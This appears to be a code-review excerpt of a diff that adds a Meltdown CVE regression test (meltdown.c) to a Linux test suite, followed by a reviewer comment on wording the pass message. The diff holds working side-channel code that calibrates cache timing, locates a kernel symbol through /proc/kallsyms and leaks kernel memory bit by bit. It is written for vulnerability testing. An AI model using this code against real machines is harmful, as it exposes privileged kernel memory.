testcases/cve/meltdown.c

```diff
@@ -0,0 +1,324 @@
+
+		if (time <= cache_hit_threshold)
+			hist[i]++;
+	}
+}
+
+#define CYCLES 10000
+int readbit(int fd, unsigned long addr, char bit)
+{
+	int i, ret;
+	static char buf[256];
+
+	memset(hist, 0, sizeof(hist));
+
+	for (i = 0; i < CYCLES; i++) {
+		ret = pread(fd, buf, sizeof(buf), 0);
+		if (ret < 0)
+			tst_res(TBROK | TERRNO, "can't read /proc/version");
+
+		clflush_target();
+
+		speculate(addr, bit);
+		check();
+	}
+
+#ifdef DEBUG
+	for (i = 0; i < BITS_BY_READ; i++)
+		tst_res(TINFO, "addr %lx hist[%x] = %d", addr, i, hist[i]);
+#endif
+
+	if (hist[1] > CYCLES / 10)
+		return 1;
+	return 0;
+}
+
+int readbyte(int fd, unsigned long addr)
+{
+	int bit, res = 0;
+
+	for (bit = 0; bit < 8; bit ++ )
+		res |= (readbit(fd, addr, bit) << bit);
+
+	return res;
+}
+
+
+static int mysqrt(long val)
+{
+	int root = val / 2, prevroot = 0, i = 0;
+
+	while (prevroot != root && i < 100) {
+		prevroot = root;
+		root = (val / root + root) / 2;
+	}
+
+	return root;
+}
+
+#define ESTIMATE_CYCLES	1000000
+static void
+set_cache_hit_threshold(void)
+{
+	long cached, uncached, i;
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
+		_mm_clflush(target_array);
+		uncached += get_access_time(target_array);
+	}
+
+	cached /= ESTIMATE_CYCLES;
+	uncached /= ESTIMATE_CYCLES;
+
+	cache_hit_threshold = mysqrt(cached * uncached);
+
+	tst_res(TINFO, "cached = %ld, uncached = %ld, threshold = %d",
+		cached, uncached, cache_hit_threshold);
+}
+
+static unsigned long
+find_kernel_symbol(const char *name)
+{
+	unsigned long addr;
+	char type;
+	int ret, read;
+	char fmt[strlen(name) + 64];
+
+	sprintf(fmt, "%%lx %%c %s%%c", name);
+
+	ret = SAFE_FILE_LINES_SCANF("/proc/kallsyms", fmt, &addr, &type, &read);
+	if (ret)
+		tst_brk(TBROK, "can't find '%s'", name);
+
+	return addr;
+}
+
+unsigned long linux_proc_banner_addr;
+int banner_fd;
+
+static void setup(void)
+{
+	set_cache_hit_threshold();
+
+	linux_proc_banner_addr = find_kernel_symbol("linux_proc_banner");
+
+	banner_fd = SAFE_OPEN("/proc/version", O_RDONLY);
+
+	memset(target_array, 1, sizeof(target_array));
+
+	if (set_signal() < 0)
+		tst_res(TBROK | TERRNO, "set_signal");
+}
+
+static void run(void)
+{
+	unsigned int i, score, ret;
+	static char expected[] = "%s version %s";
+	static char read[32];
+	unsigned long addr = linux_proc_banner_addr;
+	unsigned long size = sizeof(expected) - 1;
+
+	for (i = 0; i < size; i++) {
+		ret = readbyte(banner_fd, addr);
+
+		read[i] = ret;
+		tst_res(TINFO, "read %lx = 0x%x %c", addr, ret,
+			isprint(ret) ? ret : ' ');
+
+		addr++;
+	}
+
+	for (score = 0, i = 0; i < size; i++)
+		if (expected[i] == read[i])
+			score++;
+
+	if (score > size / 2)
+		tst_res(TFAIL, "I was able to read your kernel memory!!!");
+	else
+		tst_res(TPASS, "Not vulnerable for meltdown");
```

Comment:
I think this should be "Not able to read kernel memory", because there may be some way of circumventing kPTI or if the test is being run on AMD who claim kPTI is not necessary, there may be some way of getting it to work that we don't know about. Maybe that seems unlikely, but I think it is better to be cautious.